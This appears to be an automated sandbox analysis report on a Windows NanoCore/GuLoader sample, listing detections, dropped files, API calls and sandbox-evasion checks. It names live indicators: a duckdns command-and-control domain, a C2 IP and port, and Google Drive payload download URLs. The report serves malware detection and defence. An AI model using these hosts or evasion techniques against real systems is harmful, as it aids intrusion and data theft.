Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Analysis ID: 736731
MD5: 5f570885a22cf0a74ca454ea710bcd2e
SHA1: 82e8aa91a64dd2e0f1c18317518e9e2914387967
SHA256: a1dbe6c38c03059bd197cde9e455e03875c32dd034cc6c229c4c62b2d1753eaf

Detection

NanoCore, GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe (PID: 6320 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe MD5: 5F570885A22CF0A74CA454EA710BCD2E)
    • CasPol.exe (PID: 2752 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000A.00000000.29011621997.0000000001100000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe PID: 6320 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |

            AV Detection

            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 2752, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            E-Banking Fraud

            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 2752, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            Stealing of Sensitive Information

            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 2752, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

            Remote Access Functionality

            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 2752, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat
            No Snort rule has matched

            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49840 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.11.20:49841 version: TLS 1.2
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_004065C5 FindFirstFileW,FindClose,1_2_004065C5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405990
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

            Networking

            Source: unknown; DNS query: name: mastersure042.duckdns.org
            Source: Joe Sandbox View; ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
            Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache
            Source: global traffic; HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-10-90-docs.googleusercontent.com | Connection: Keep-Alive
            Source: global traffic; TCP traffic: 192.168.11.20:49842 -> 91.193.75.140:4235
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000A.00000003.29241458764.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29236851194.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29542583140.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetupHelper.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: CasPol.exe, 0000000A.00000003.29542547284.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29236851194.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29241414846.00000000014E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetupHelper.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-90-docs.googleusercontent.com/
            Source: CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-90-docs.googleusercontent.com/7
            Source: CasPol.exe, 0000000A.00000003.29242029782.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29237253452.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29542976844.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29541952931.000000000149C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8d
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405425
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403373
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B84AFC NtResumeThread,1_2_02B84AFC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B839D6 NtProtectVirtualMemory,1_2_02B839D6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeStatic PE information: invalid certificate
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Thow.lnk.1.drLNK file: ..\Start Menu\Stripteased\Thysanopteron\Rektifikationen\Tetradrachm.Tid
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\LigtornJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile created: C:\Users\user\AppData\Local\Temp\nsz9E7B.tmpJump to behavior
            Source: classification engineClassification label: mal84.troj.evad.winEXE@4/7@23/4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_004020FE CoCreateInstance,1_2_004020FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004046E6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{87d3a662-fd07-4a8e-827d-d0ddb84eb2a6}
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:304:WilStaging_02
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe, type: DROPPED
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior

            Data Obfuscation

            Source: Yara matchFile source: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000000.29011621997.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe PID: 6320, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B686D6 pushad ; retf 1_2_02B6870E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B62E06 push ds; ret 1_2_02B62E86
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B67E47 push esp; ret 1_2_02B67E56
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B677DB pushfd ; iretd 1_2_02B677DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B630AF push FFFFFFE8h; iretd 1_2_02B630CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B640C9 push ecx; retf 1_2_02B640D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B6405E push ecx; retf 1_2_02B640D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B64134 push ecx; retf 1_2_02B640D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_02B60542 push ecx; iretd 1_2_02B605C3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile created: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, File opened: C:\Program Files\qga\qga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEIUX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 6604, Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4808, Thread sleep time: -220000s >= -30000s
            Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_02B60AA2 rdtsc 1_2_02B60AA2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Window / User API: threadDelayed 544
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Window / User API: threadDelayed 1377
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Window / User API: foregroundWindowGot 1510
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_004065C5 FindFirstFileW,FindClose,1_2_004065C5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405990
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_00402862 FindFirstFileW,1_2_00402862
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, System information queried: ModuleInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, API call chain: ExitProcess graph end node graph_1-13697
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, API call chain: ExitProcess graph end node graph_1-13701
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Users\user
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Users\user\AppData\Roaming
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeiux
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicvss
            Source: CasPol.exe, 0000000A.00000003.29542119343.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29267083772.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, Process token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_02B80E92 mov eax, dword ptr fs:[00000030h] 1_2_02B80E92
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, Code function: 1_2_02B82CB9 mov eax, dword ptr fs:[00000030h] 1_2_02B82CB9
